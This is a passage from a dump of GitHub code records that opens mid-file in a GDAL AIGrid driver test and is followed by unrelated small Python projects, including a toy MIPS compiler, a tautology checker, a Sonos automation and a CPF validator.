os.path.exists(\"tmp/broken_aigrid\"):\n shutil.rmtree(\"tmp/broken_aigrid\")\n\n shutil.copytree(\"data/aigrid/abc3x1\", \"tmp/broken_aigrid\")\n\n # Write a bad offset for a block\n f = gdal.VSIFOpenL(\"tmp/broken_aigrid/w001001x.adf\", \"rb+\")\n gdal.VSIFSeekL(f, 100, 0)\n gdal.VSIFWriteL(b\"\\xff\" * 4, 1, 4, f)\n gdal.VSIFCloseL(f)\n\n ds = gdal.Open(\"tmp/broken_aigrid\")\n with pytest.raises(Exception):\n ds.GetRasterBand(1).Checksum()\n with pytest.raises(Exception):\n ds.GetRasterBand(1).Checksum()\n ds = None\n\n shutil.rmtree(\"tmp/broken_aigrid\")\n\n\n###############################################################################\n# Test on real dataset downloaded from http://download.osgeo.org/gdal/data/aig/nzdem\n\n\ndef test_aigrid_online_1():\n\n list_files = [\n \"info/arc.dir\",\n \"info/arc0000.dat\",\n \"info/arc0000.nit\",\n \"info/arc0001.dat\",\n \"info/arc0001.nit\",\n \"info/arc0002.dat\",\n \"info/arc0002.nit\",\n \"info/arc0002r.001\",\n \"nzdem500/dblbnd.adf\",\n \"nzdem500/hdr.adf\",\n \"nzdem500/log\",\n \"nzdem500/sta.adf\",\n \"nzdem500/vat.adf\",\n \"nzdem500/w001001.adf\",\n \"nzdem500/w001001x.adf\",\n ]\n\n try:\n os.mkdir(\"tmp/cache/nzdem\")\n os.mkdir(\"tmp/cache/nzdem/info\")\n os.mkdir(\"tmp/cache/nzdem/nzdem500\")\n except OSError:\n pass\n\n for filename in list_files:\n gdaltest.download_or_skip(\n \"http://download.osgeo.org/gdal/data/aig/nzdem/\" + filename,\n \"nzdem/\" + filename,\n )\n\n tst = gdaltest.GDALTest(\n \"AIG\", \"tmp/cache/nzdem/nzdem500/hdr.adf\", 1, 45334, filename_absolute=1\n )\n tst.testOpen()\n\n ds = gdal.Open(\"tmp/cache/nzdem/nzdem500/hdr.adf\")\n\n try:\n rat = ds.GetRasterBand(1).GetDefaultRAT()\n except Exception:\n print(\"Skipping RAT checking... OG Python bindings have no RAT API\")\n return\n\n assert rat is not None, \"No RAT found\"\n\n assert rat.GetRowCount() == 2642, \"Wrong row count in RAT\"\n\n assert rat.GetColumnCount() == 2, \"Wrong column count in RAT\"\n\n assert rat.GetNameOfCol(0) == \"VALUE\", \"Wrong name of col 0\"\n\n assert rat.GetTypeOfCol(0) == gdal.GFT_Integer, \"Wrong type of col 0\"\n\n assert rat.GetUsageOfCol(0) == gdal.GFU_MinMax, \"Wrong usage of col 0\"\n\n assert rat.GetNameOfCol(1) == \"COUNT\", \"Wrong name of col 1\"\n\n assert rat.GetTypeOfCol(1) == gdal.GFT_Integer, \"Wrong type of col 1\"\n\n assert rat.GetUsageOfCol(1) == gdal.GFU_PixelCount, \"Wrong usage of col 1\"\n\n assert rat.GetValueAsInt(2641, 0) == 3627, \"Wrong value in RAT\"\n\n assert ds.GetRasterBand(1).GetMinimum() == 0.0, \"Wrong minimum\"\n\n assert ds.GetRasterBand(1).GetMaximum() == 3627.0, \"Wrong maximum\"\n\n\n###############################################################################\n# Test on real dataset downloaded from http://download.osgeo.org/gdal/data/aig/nzdem\n\n\ndef test_aigrid_online_2():\n\n gdaltest.download_or_skip(\n \"http://download.osgeo.org/gdal/data/aig/ai_bug_6886.zip\", \"ai_bug_6886.zip\"\n )\n\n try:\n os.stat(\"tmp/cache/ai_bug\")\n except OSError:\n try:\n gdaltest.unzip(\"tmp/cache\", \"tmp/cache/ai_bug_6886\")\n try:\n os.stat(\"tmp/cache/ai_bug\")\n except OSError:\n pytest.skip()\n except Exception:\n pytest.skip()\n\n tst = gdaltest.GDALTest(\n \"AIG\", \"tmp/cache/ai_bug/ai_bug/hdr.adf\", 1, 16018, filename_absolute=1\n )\n tst.testOpen()\n\n\n###############################################################################\n","repo_name":"OSGeo/gdal","sub_path":"autotest/gdrivers/aigrid.py","file_name":"aigrid.py","file_ext":"py","file_size_in_byte":6834,"program_lang":"python","lang":"en","doc_type":"code","stars":4154,"dataset":"github-code","pt":"19"} +{"seq_id":"42655906341","text":"# 7. Write a function which returns an array of seven random numbers in a range of 0-9. All the numbers must be unique.\nimport random\n\ndef sevenRandom():\n mySet = set()\n while len(mySet) < 7:\n mySet.add(random.randint(0,9))\n return list(mySet)\n\nprint(sevenRandom())","repo_name":"Engenheiro-VictorGomes/30DaysOfPython","sub_path":"Day12/E7.py","file_name":"E7.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26890599254","text":"import re\r\n\r\n\r\n\r\ntext_segment = \".text\\n\"\r\ndata_segment = \".data\\n\"\r\n\r\n\r\n# declaring possible patterns,\r\npattern_start,pattern2,pattern_end = r\"^[a-zA-z0-9?]\", r\"^#\",r\"[a-zA-z0-9?]$\"\r\npattern_var = r\"^[a-zA-Z]+[0-9]?\"\r\npattern_component = r\"[a-zA-Z0-9?]+|[0-9]+\"\r\n\r\noperations = ['+','-','/','*','**','%','//']\r\n# operation_map = {\r\n# \"+\" : \"add\",\r\n# \"-\" : \"sub\",\r\n# \"*\" : \"mul\",\r\n# \"/\" : \"div\",\r\n# \"//\" : \"mflo\",\r\n# \"%\" : \"rem\"\r\n# } \r\nVAR_REG = [\"$t0\"] # initializing register and for the pupose of dynamic allocation\r\ncn = 0 # to count register\r\n\r\ndef sortPrecedence(Plist:list):\r\n diction = {'+':6,'-':5,'/':4,'*':1,'**':0,'%':3,'//':2}\r\n toSort = []\r\n Slist = []\r\n for i in Plist:\r\n toSort += [diction[i[0]]]\r\n toSort.sort()\r\n flipped_dict = {value: key for key, value in diction.items()}\r\n\r\n for j in toSort:\r\n for k in Plist :\r\n if k[0] == flipped_dict[j]:\r\n Slist += [k]\r\n \r\n return Slist\r\ndef adjustReg(cn):\r\n global VAR_REG\r\n cn += 1 \r\n VAR_REG += [f'$t{cn}']\r\n return VAR_REG\r\n\r\n\r\n\r\n\r\ndef doMath(code):\r\n global data_segment, text_segment, cn, VAR_REG, operations, pattern2,pattern_check, pattern_component, pattern_end, pattern_start, pattern_var\r\n input_lines = code.split(\"\\n\")\r\n \r\n \r\n for line in input_lines:\r\n line = line.strip()\r\n if re.search(pattern2,line):\r\n continue\r\n start_right = re.findall(pattern_start,line)\r\n end_right = re.findall(pattern_end,line)\r\n if start_right and end_right:\r\n assign = False\r\n Terminal = line\r\n if '=' in line:\r\n splitted = line.split('=')\r\n \r\n nonTerminal, Terminal = splitted[0], splitted[1]\r\n # we expect the nonTerminal to be variable and a valid expression, so let's check it out\r\n if not re.search(pattern_var,nonTerminal):\r\n return \"invalid expression\"\r\n data_segment += f\"{nonTerminal}: .word 0\\n\" # adding the variable into the data segment\r\n assign = True\r\n \r\n\r\n\r\n \r\n # Now we're left with the Terminal part, the expression to be evaluated\r\n #check it's validity and produce precedence map, we gonna do it a two-dimentional array \r\n precedence = []\r\n ct = 0\r\n for i in operations:\r\n if i in Terminal:\r\n pattern_check = rf'(\\w|\\d|\\s){i}(\\w|\\d|\\s)'\r\n check = re.search(pattern_check,Terminal)\r\n if check:\r\n ct += 1\r\n precedence += [[f'{i}',ct]]\r\n\r\n if not check or (i == '*' or i == '/'):\r\n pattern_check = rf'(\\w|\\d|\\s){i+i}(\\w|\\d|\\s)'\r\n check = re.search(pattern_check,Terminal)\r\n if not check:\r\n return \"Invalid syntax\"\r\n ct += 1\r\n precedence += [[f'{i}{i}',ct]] \r\n \r\n\r\n components = re.findall(pattern_component,Terminal)\r\n precedence = sortPrecedence(precedence)\r\n\r\n\r\n #at this point we got the components and the precedence array, therfore do a thing to change it into assembly program\r\n # sort the precedence\r\n\r\n for op in precedence:\r\n operand1, operand2 = components[op[1]-1], components[op[1]]\r\n ## polishing our register by loading the existing variables and the already occupied register\r\n valid = False\r\n if operand1 in data_segment or operand2 in data_segment:\r\n valid = True\r\n if operand1 in data_segment:\r\n text_segment += f\"lw $t{cn},{operand1}\\n\"\r\n components[op[1]-1] = f'$t{cn}'\r\n adjustReg(cn)\r\n elif operand2 in data_segment:\r\n text_segment += f\"lw $t{cn},{operand2}\\n\"\r\n components[op[1]] = f'$t{cn}'\r\n adjustReg(cn)\r\n elif operand1 in VAR_REG or operand2 in VAR_REG:\r\n valid = True\r\n elif str(operand1).isdigit() or str(operand2).isdigit():\r\n valid = True\r\n if operand1.isdigit:\r\n text_segment += f\"li $t{cn},{operand1}\\n\"\r\n components[op[1]-1] = f'$t{cn}'\r\n adjustReg(cn)\r\n elif operand2.isdigit:\r\n text_segment += f\"li $t{cn},{operand2}\\n\"\r\n components[op[1]] = f'$t{cn}'\r\n adjustReg(cn)\r\n ## now we are with a list of components of registers \r\n if valid:\r\n for op in precedence: \r\n if op[0] == '**':\r\n text_segment += \"\" # to be applied using the looping struncture\r\n components = [i if i !=components[op[1]] else components[op[1]-1] for i in components]\r\n\r\n\r\n elif op[0] == '*':\r\n text_segment += f\"mul {components[op[1]-1]}, {components[op[1]-1]}, {components[op[1]]}\\n\"\r\n components = [i if i !=components[op[1]] else components[op[1]-1] for i in components]\r\n\r\n\r\n elif op[0] == '+':\r\n text_segment += f\"add {components[op[1]-1]}, {components[op[1]]}\\n\"\r\n components = [i if i !=components[op[1]] else components[op[1]-1] for i in components]\r\n\r\n\r\n\r\n elif op[0] == '-':\r\n text_segment += f\"sub {components[op[1]-1]}, {components[op[1]]}\\n\"\r\n components = [i if i !=components[op[1]] else components[op[1]-1] for i in components]\r\n\r\n\r\n\r\n elif op[0] == '//':\r\n text_segment += f\"div {components[op[1]-1]}, {components[op[1]]} \\n mflo {components[op[1]-1]}\\n\"\r\n components = [i if i !=components[op[1]] else components[op[1]-1] for i in components]\r\n\r\n\r\n\r\n elif op[0] == '/':\r\n text_segment += f\"div {components[op[1]-1]}, {components[op[1]]}\\n\"\r\n components = [i if i !=components[op[1]] else components[op[1]-1] for i in components]\r\n\r\n\r\n\r\n elif op[0] == '%':\r\n text_segment += f\"rem {components[op[1]-1]}, {components[op[1]]}\\n\"\r\n components = [i if i !=components[op[1]] else components[op[1]-1] for i in components]\r\n\r\n ## at this point all entries of the component has the same value the final value and the final register,\r\n res = components[0]\r\n\r\n if assign:\r\n data = data_segment.rstrip()\r\n data = data.split(\"\\n\")\r\n lastval = data[-1]\r\n var = lastval[:lastval.index(':')].rstrip()\r\n adjustReg(cn)\r\n\r\n text_segment += f\"la {VAR_REG[-1]}, {var} \\n sw {res},({VAR_REG[-1]})\\n\"\r\n text_segment += f\"li $v0,1 \\n move $a0,{res} \\n syscall\\n\"\r\n \r\n else:\r\n return \"Invalid Syntax\"\r\n\r\n return data_segment + text_segment\r\n \r\nprint(doMath(\"complex_math = 6 + 7\"))\r\n\r\ndef read_and_compile(file_path):\r\n with open(file_path, 'r') as file:\r\n code = file.read()\r\n mips_code = doMath(code)\r\n with open(\"output1.asm\", \"w\") as file:\r\n print(mips_code)\r\n\r\nfile_path = \"hello.py\"\r\nread_and_compile(file_path)","repo_name":"kalkidan-hub/The_Compiler","sub_path":"new_math2.py","file_name":"new_math2.py","file_ext":"py","file_size_in_byte":7813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"500327228","text":"\"\"\"Project_SMO_Inventory URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\n\nfrom django.conf.urls.static import static\nfrom django.views.generic import TemplateView\n\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^system_admin/', include('SuperUser.urls')),\n url(r'^', include('Login.urls')),\n url(r'^requisitioner/', include('Requisitioner.urls')),\n url(r'^inventory_office/', include('Inventory_Office.urls')),\n url(r'^inventory_office_admin/', include('Inventory_Office_Admin.urls')),\n url(r'^inventory_office_acct_mgr/', include('Inventory_Office_Acct_Mgr.urls')),\n url(r'^inventory_office_inv_clerk/', include('Inventory_Office_Inventory_Clerk.urls')),\n url(r'^inventory_office_rec_off/', include('Inventory_Office_Receiving_Off.urls')),\n url(r'^inventory_office_sup_off/', include('Inventory_Office_Supply_Officer.urls')),\n url(r'^procurement_office/', include('Procurement_Office.urls')),\n url(r'^approving_officer/', include('Approving_Office.urls')),\n url(r'^approving_officer_representative/', include('Approving_Office_Secretary.urls')),\n url(r'^non_requisitioner/', include('NonRequisitioner.urls')),\n url(r'^accounting/', include('Accounting.urls')),\n\n \n\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"kem1101231/Project_SMO_Inventory","sub_path":"Project_SMO_Inventory/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1155379980","text":"import re\n\nfrom flexpy.FlexPyUtil import get_single_child\nfrom flexpy.LexEntry import LexEntry\nfrom flexpy.TagDict import TagDict\n\n\n\nclass Lexicon:\n \"\"\"Contains the information in the FLEx database's lexicon.\n\n :param lex_entry_els:\n :type lex_entry_els: list(xml.etree.ElementTree.Element)\n :param tag_dict:\n :type tag_dict: :class:`flexpy.TagDict.TagDict`\n \"\"\"\n def __init__(self, lex_entry_els, tag_dict):\n self.lex_entry_els = lex_entry_els\n self.tag_dict = tag_dict\n self.lex_entries = self.create_lex_entries()\n\n @staticmethod\n def from_project_dir_and_name(project_dir, project_name):\n tag_dict = TagDict.from_project_dir_and_name(project_dir, project_name)\n return Lexicon.from_tag_dict(tag_dict)\n\n @staticmethod\n def from_tag_dict(tag_dict):\n lex_entries = tag_dict[\"RtLexEntry\"]\n return Lexicon(lex_entries, tag_dict)\n\n def create_lex_entries(self):\n res = []\n for guid, rts_with_guid in self.lex_entry_els.items():\n for rt in rts_with_guid:\n lex_entry = LexEntry(rt, self.tag_dict)\n res.append(lex_entry)\n return res\n\n def search_glosses(self, regex):\n \"\"\"Searches the lexicon's glosses for a regex\n \"\"\"\n results = []\n\n for lex_entry in self.lex_entries:\n for gloss in lex_entry.glosses:\n matches = re.search(regex, gloss)\n if matches is not None:\n results.append(lex_entry)\n break # don't double-add it if multiple senses match\n return results\n\n","repo_name":"Kuhron/flexpy","sub_path":"flexpy/Lexicon.py","file_name":"Lexicon.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"74666512420","text":"'''\nPrint all interleavings of given two strings\nGiven two strings str1 and str2, write a function that prints all interleavings of the given two strings.\nYou may assume that all characters in both strings are different\nExample:\n\nInput: str1 = \"AB\", str2 = \"CD\"\nOutput:\n ABCD\n ACBD\n ACDB\n CABD\n CADB\n CDAB\n\nInput: str1 = \"AB\", str2 = \"C\"\nOutput:\n ABC\n ACB\n CAB\n'''\n\nimport collections\n\ndef Validate(tmp,str1,str2):\n\n index_lst=[]\n for i in range(0,len(str1)):\n key=str1[i]\n idx=tmp.index(key)\n if len(index_lst)==0:\n index_lst.append(idx)\n else:\n if index_lst[-1]\")\n sys.exit(1)\n\nparms = {}\n\ndef mavparms(logfile):\n '''extract mavlink parameters'''\n mlog = mavutil.mavlink_connection(filename)\n\n while True:\n m = mlog.recv_match(type='PARAM_VALUE')\n if m is None:\n return\n pname = str(m.param_id).strip()\n if len(pname) > 0:\n parms[pname] = m.param_value\n\ntotal = 0.0\nfor filename in args:\n mavparms(filename)\n\nkeys = parms.keys()\nkeys.sort()\nfor p in keys:\n print(\"%-15s %.6f\" % (p, parms[p]))\n \n","repo_name":"jlnaudin/x-VTOLdrone","sub_path":"PixHawk_PX4/PX4Firmware/mavlink/share/pyshared/pymavlink/examples/mavparms.py","file_name":"mavparms.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"35"} +{"seq_id":"28478923166","text":"class VariableNotFound(Exception):\n '''A variable in Formula is not defined in zmienna'''\n pass\nclass WrongConstantValue(Exception):\n '''An init value in Stala is neither True or False'''\n pass\n\nclass Formula:\n def oblicz(self,zmienne):\n pass\n def uprosc(self):\n return self\n def __add__(self,f1):\n return Or(self,f1)\n def __mul__(self,f1):\n return And(self,f1)\n def findVar(self):\n pass\n def recTaut(self,idx, v, zm):\n if len(v) == len(zm):\n return self.oblicz(zm)\n zm.append([v[idx],True])\n l = self.recTaut(idx+1,v,zm)\n zm[idx][1]=False\n r = self.recTaut(idx+1,v,zm)\n return l and r\n def tautologia(self):\n var = list(filter(lambda x : x!='',self.findVar()))\n var = list(dict.fromkeys(var))#remove duplicates\n return self.recTaut(0,var,[])\n \nclass Stala(Formula):\n def __init__(self,v):\n try:\n if v!=True and v!=False:\n raise WrongConstantValue\n self.val = bool(v)\n except WrongConstantValue:\n print('value',v,'is neither True or False')\n self.val = None\n def __str__(self):\n return str(self.val)\n def oblicz(self,zmienne):\n return self.val\n def findVar(self):\n return ['']\n\nclass Zmienna(Formula):\n def __init__(self,n):\n self.name = str(n)\n def __str__(self):\n return self.name\n def findVar(self):\n return [self.name]\n def oblicz(self,zmienne):\n try:\n for z in zmienne:\n if self.name in z:\n return z[1]\n raise VariableNotFound\n except VariableNotFound:\n print('nieznana zmienna', self.name)\n return None\n\nclass Not(Formula):\n def __init__(self,f):\n self.f1 = f\n def uprosc(self):\n f1u = self.f1.uprosc()\n if type(f1u) == Stala:\n if f1u.oblicz([]) == False:\n return Stala(True)\n else:\n return Stala(False)\n return Not(f1u)\n def findVar(self):\n return self.f1.findVar()\n def __str__(self):\n return '-'+str(self.f1)\n def oblicz(self,zmienne):\n l = self.f1.oblicz(zmienne)\n if l is None:\n return None\n return not l\n\nclass And(Formula):\n def __init__(self,l,r):\n self.f1 = l\n self.f2 = r\n def uprosc(self):\n f1u = self.f1.uprosc()\n f2u = self.f2.uprosc()\n if type(f1u) == Stala:\n if f1u.oblicz([]) == False:\n return Stala(False)\n else:\n return f2u\n if type(f2u) == Stala: \n if f2u.oblicz([]) == False:\n return Stala(False)\n else:\n return f1u\n return And(f1u,f2u)\n def findVar(self):\n l = self.f1.findVar()\n r = self.f2.findVar()\n for x in r:\n l.append(x)\n return l\n def __str__(self):\n return '(' + str(self.f1) + ' & ' + str(self.f2) + ')'\n def oblicz(self,zmienne):\n l = self.f1.oblicz(zmienne)\n r = self.f2.oblicz(zmienne)\n if l is None or r is None:\n return None\n return l and r\n \nclass Or(Formula):\n def __init__(self,l,r):\n self.f1 = l\n self.f2 = r\n def uprosc(self):\n f1u = self.f1.uprosc()\n f2u = self.f2.uprosc()\n if type(f1u) == Stala:\n if f1u.oblicz([]) == True:\n return Stala(True)\n else:\n return f2u\n if type(f2u) == Stala: \n if f2u.oblicz([]) == True:\n return Stala(True)\n else:\n return f1u\n return Or(f1u,f2u)\n def findVar(self):\n l = self.f1.findVar()\n r = self.f2.findVar()\n for x in r:\n l.append(x)\n return l\n def __str__(self):\n return '(' + str(self.f1) + ' | ' + str(self.f2) + ')'\n def oblicz(self,zmienne):\n l = self.f1.oblicz(zmienne)\n r = self.f2.oblicz(zmienne)\n if l is None or r is None:\n return None\n return l or r\n \n \nf = Not(Stala(False))*Stala(True)+Stala(False)\nz = [['x',True]]\n\nprint(f, '.oblicz =', f.oblicz(z))\nprint()\n\ng = And(And(Stala(True),Stala(False)),Or(Stala(True),Zmienna('x')))\nprint(g, '.uprosc =' ,g.uprosc())\n\nh = And(And(Stala(True),Stala(True)),Or(Stala(False),Zmienna('x')))\nprint(h, '.uprosc =' ,h.uprosc())\n\nk = Or(And(Stala(True),Stala(True)),Or(Stala(False),Zmienna('x')))\nprint(k, '.uprosc =' ,k.uprosc())\n\nprint()\nfail = Zmienna('Y') + Stala(False)\nprint(fail, '.oblicz =', fail.oblicz(z), 'dla zmiennych =',z)\nfail = Stala('prawda')\nprint(fail, '.oblicz =', fail.oblicz(z), 'dla zmiennych =',z)\n\nprint()\nprint(h, '.oblicz =', h.oblicz(z))\n\nprint()\nl = And(Zmienna('x'),Zmienna('y'))\n\nz = [['y',False],['x',False]]\nprint(l, '.oblicz =', l.oblicz(z), 'dla zmiennych =',z)\nz = [['y',False],['x',True]]\nprint(l, '.oblicz =', l.oblicz(z), 'dla zmiennych =',z)\nz = [['y',True],['x',False]]\nprint(l, '.oblicz =', l.oblicz(z), 'dla zmiennych =',z)\nz = [['y',True],['x',True]]\nprint(l, '.oblicz =', l.oblicz(z), 'dla zmiennych =',z)\n\nprint()\ntaut = Or(Zmienna('y'),Or(Or(Zmienna('x'),Not(Zmienna('x'))),Zmienna('z')))\nprint(taut, '.tautologia = ', taut.tautologia())\nnottaut = And(Zmienna('y'),Or(Or(Zmienna('x'),Not(Zmienna('x'))),Zmienna('z')))\nprint(nottaut, '.tautologia = ', nottaut.tautologia())\n\nprint()\nprint(h, '.uprosc = ',h.uprosc(), '.tautologia =' ,h.uprosc().tautologia())\n","repo_name":"MaciejZientara/Studia","sub_path":"python/lista5/zad2.py","file_name":"zad2.py","file_ext":"py","file_size_in_byte":5570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39024298828","text":"import appdaemon.plugins.hass.hassapi as hass\nimport datetime\nimport time\n\nclass MusicSnapshot(hass.Hass):\n def initialize(self):\n entity_name = \"media_player.samsung_7_series_55\"\n self.media_entity = \"media_player.sonos_living_room\"\n self.my_enitity = self.get_entity(entity_name)\n self.my_enitity.listen_state(self.music_snapsnotcb, new = \"on\")\n self.my_enitity.listen_state(self.music_restorecb, new = \"off\")\n \n def music_snapsnotcb(self, entity, attribute, old, new, kwargs):\n self.log(\"Creating Sonos snapshot\")\n self.sonos_enitity = self.get_entity(self.media_entity)\n #self.log(self.list_services())\n self.call_service(\"sonos/snapshot\", entity_id = self.media_entity)\n self.sonos_enitity.call_service(\"media_pause\")\n self.log_state_change(entity_name = self.media_entity)\n \n def music_restorecb(self, entity, attribute, old, new, kwargs):\n #Restore only until 23:00:00\n if self.now_is_between(start_time = \"08:00:00\", end_time = \"23:00:00\"):\n self.log(\"Restoring Sonos snapshot\")\n self.call_service(\"sonos/restore\", entity_id = self.media_entity)\n self.sonos_enitity = self.get_entity(self.media_entity)\n self.sonos_enitity.call_service(\"media_play\")\n self.log_state_change(entity_name = self.media_entity)\n \n def log_state_change(self, entity_name = \"\"):\n time.sleep(1)\n str = f\"Entity {entity_name} state change to {self.get_entity(entity_name).get_state()}\"\n self.log(str, ascii_encode=False)\n \n ","repo_name":"ankmanj/AppDaemonApps","sub_path":"music_snapshot.py","file_name":"music_snapshot.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26061288272","text":"#!/usr/bin/env python3\n\"\"\"Problem - Day 4\nGiven an array of integers, find the first missing positive integer in linear time and constant space. In other words, find the lowest positive integer that does not exist in the array. The array can contain duplicates and negative numbers as well.\nFor example, the input [3, 4, -1, 1] should give 2. The input [1, 2, 0] should give 3.\nYou can modify the input array in-place.\n\"\"\"\nL1 = [3, 4, -1, 1]\nL2 = [1, 2, 0]\n\n\ndef first_missing_pos(l):\n posl = sorted([n for n in l if n > 0])\n for n in enumerate(posl[1:]):\n if not n[1] == posl[n[0]] + 1:\n result = posl[n[0]] + 1\n return result\n result = posl[-1] + 1\n return result\n\n\nif __name__ == '__main__':\n print(first_missing_pos(L1))\n print(first_missing_pos(L2))\n","repo_name":"cbeach512/dailycodingproblem","sub_path":"day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10565010737","text":"import json\nimport os\n\ndef convert_json(filename):\n with open(filename) as f:\n data = json.load(f)\n\n newData = [{\n 'dataset_name': os.path.basename(filename),\n 'image_link': '',\n 'annotation_type': 'image',\n 'annotation_objects': {},\n 'annotation_attributes': {}\n }]\n\n for obj in data['objects']:\n if obj['classTitle'] == 'Vehicle':\n newData[0]['annotation_objects']['vehicle'] = {\n 'presence': 1,\n 'bbox': obj['points']['exterior'][0] + obj['points']['exterior'][1]\n }\n newData[0]['annotation_attributes']['vehicle'] = {}\n for tag in obj['tags']:\n newData[0]['annotation_attributes']['vehicle'][tag['name']] = tag['value']\n elif obj['classTitle'] == 'License Plate':\n newData[0]['annotation_objects']['license_plate'] = {\n 'presence': 1,\n 'bbox': obj['points']['exterior'][0] + obj['points']['exterior'][1]\n }\n newData[0]['annotation_attributes']['license_plate'] = {}\n for tag in obj['tags']:\n newData[0]['annotation_attributes']['license_plate'][tag['name']] = tag['value']\n\n newFile = 'formatted_' + os.path.basename(filename)\n with open(newFile, 'w') as f:\n json.dump(newData, f, indent=4)\n print(f'File created: {filename} to {newFile}')\n\ndef combine_jsons():\n folder_path = os.getcwd() # JSON files are in the current working directory\n\n combined_data = []\n json_files = ['pos_0.png.json', 'pos_10010.png.json', 'pos_10492.png.json']\n\n for json_file in json_files:\n with open(os.path.join(folder_path, json_file), 'r') as file:\n data = json.load(file)\n\n for obj in data['objects']:\n new_obj = {}\n if obj['classTitle'] == 'Vehicle':\n new_obj['class'] = 'car'\n elif obj['classTitle'] == 'License Plate':\n new_obj['class'] = 'number'\n\n new_obj['bounding_box'] = obj['points']['exterior'][0] + obj['points']['exterior'][1]\n combined_data.append(new_obj)\n\n combined_json = {'combined_objects': combined_data}\n combined_filename = 'combined.json'\n\n with open(combined_filename, 'w') as file:\n json.dump(combined_json, file, indent=4)\n\n print(f'Successfully combined JSON files into {combined_filename}')\n\n# Testing:::\njson_file1 = 'pos_0.png.json'\njson_file2 = 'pos_10010.png.json'\njson_file3 = 'pos_10492.png.json'\nconvert_json(json_file1)\nconvert_json(json_file2)\nconvert_json(json_file3)\ncombine_jsons()\n\n# to see newly created files: originally done on jupiter notebook\nwith open('combined.json','r') as f:\n dataShowCombined=json.load(f)\nprint(dataShowCombined)\n#-----------------------------------------------\nwith open('formatted_pos_0.png.json','r') as f:\n dataShow1=json.load(f)\nprint(dataShow1)\n#-----------------------------------------------\nwith open('formatted_pos_10010.png.json','r') as f:\n dataShow2=json.load(f)\nprint(dataShow2)\n#-----------------------------------------------\nwith open('formatted_pos_10492.png.json','r') as f:\n dataShow3=json.load(f)\nprint(dataShow3)","repo_name":"rifat328/Quantigo-AI-solution","sub_path":"script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28136066564","text":"cpf = []\ncpfVerificacao = []\n\nwhile len(cpf) <= 10:\n Algarismos = int(input(\"Escreva um dígito do seu cpf de cada vez: \"))\n if len(str(Algarismos)) > 1:\n print(\"Nao pode escrever esse numero.\")\n else:\n cpf.append(Algarismos)\n cpfVerificacao.append(Algarismos)\n\ncpf.pop()\ncpf.pop()\n\nCondição = False\nCondição2 = False\n\nwhile Condição != True:\n contador = 10\n Multiplicados = []\n for i in cpf:\n resultado = i * contador\n Multiplicados.append(resultado)\n contador -= 1\n if contador == 1:\n Condição = True\n\nResto = sum(Multiplicados)%11 \n\ndef verificacao1(Valor):\n if Resto < 2:\n Dígito = 0 \n if Resto >= 2:\n Dígito = 11 - Resto \n return Dígito\n\ncpf.append(verificacao1(Resto))\n\nwhile Condição2 != True:\n contador2 = 11\n Multiplicados2 = []\n for i in cpf:\n resultado2 = i * contador2\n Multiplicados2.append(resultado2)\n contador2 -= 1\n if contador2 == 1:\n Condição2 = True\n\nResto2 = sum(Multiplicados2)%11 \n\ndef verificacao2(Valor2):\n if Resto2 < 2:\n Dígito2 = 0 \n if Resto2 >= 2:\n Dígito2 = 11 - Resto2 \n return Dígito2\n\ncpf.append(verificacao2(Resto2))\n\nif cpf == cpfVerificacao:\n print(\"CPF Válido\")\nelse:\n print(\"CPF Inválido\")","repo_name":"RogerPenha/Programa-de-Validacao-de-CPF","sub_path":"verificação-de-CPF.py","file_name":"verificação-de-CPF.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17241450893","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\n'''14.py\n@author:cnfuyu\n@date:2013-4-11\n'''\n\nimport Image\n\nif __name__ == '__main__':\n im = Image.open('./python_challenge_14.png')\n nim = Image.new(im.mode, (100, 100))\n left, bottom, right, top = 0, 0, 99, 99\n x, y = 0, 0\n dirx, diry = 0, 1\n \n for t in range(10000):\n nim.putpixel( (x, y), im.getpixel( (t, 0) ) )\n if x == left and y == top:\n dirx, diry = 1, 0\n elif x == right and y == top:\n dirx, diry = 0, -1\n elif x == right and y == bottom:\n dirx, diry = -1, 0\n elif x == left + 1 and y == bottom:\n dirx, diry = 0, 1\n left += 1\n right -= 1\n top -= 1\n bottom += 1\n\n x += dirx\n y += diry\n \n nim.save('./python_challenge_result_14.png')\n\n","repo_name":"cnfuyu/pythonchallenge","sub_path":"python_challenge_14/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} 